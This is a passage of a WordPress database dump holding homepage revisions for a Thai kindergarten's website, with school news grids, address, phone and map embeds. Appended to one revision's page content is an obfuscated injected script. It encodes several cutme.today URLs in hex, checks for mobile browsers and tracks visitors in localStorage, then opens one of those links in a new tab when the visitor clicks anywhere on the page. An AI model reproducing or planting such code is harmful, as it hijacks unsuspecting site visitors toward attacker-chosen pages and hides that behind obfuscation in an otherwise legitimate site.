ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-23 14:32:49','2024-08-23 07:32:49','',19,'http://watprato.ssk.in.th/?p=208',0,'revision','',0),
(210,2,'2024-08-23 14:38:10','2024-08-23 07:38:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap 